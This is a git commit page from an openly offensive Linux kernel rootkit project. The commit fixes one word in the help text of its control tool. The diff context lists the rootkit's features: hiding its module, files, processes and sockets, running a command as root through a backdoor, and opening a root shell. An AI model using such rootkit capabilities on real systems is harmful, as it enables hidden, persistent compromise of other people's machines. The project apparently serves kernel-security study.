linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit 58a8855a4cf61223b59d83463b6c579fdc7cadbe
parent 781be93c5a201805e01bf1790b549e625c38a91a
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 14 Dec 2020 12:59:07 +0100

adds missing word in rkctl help message

Diffstat:
Msrc/rkctl/rkctl.c | 2+-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c @@ -266,7 +266,7 @@ help() printf("%-42s %s\n", "modhide <on | off>", "{,un}hide rootkit module"); printf("%-42s %s\n", "filehide [open] <toggle | on | off>", "{,un}hide [open] files"); printf("%-42s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process"); - printf("%-42s %s\n", "socket <hide | unhide> <tcp | udp> <port>", "{,un}hide a tcp or udp with the given port"); + printf("%-42s %s\n", "socket <hide | unhide> <tcp | udp> <port>", "{,un}hide a tcp or udp socket with the given port"); printf("%-42s %s\n", "sockethide-off", "disable any (tcp or udp) socket hiding"); printf("%-42s %s\n", "backdoor <execve_command>", "exec a command as root"); printf("%-42s %s\n", "shell", "obtain a shell as root");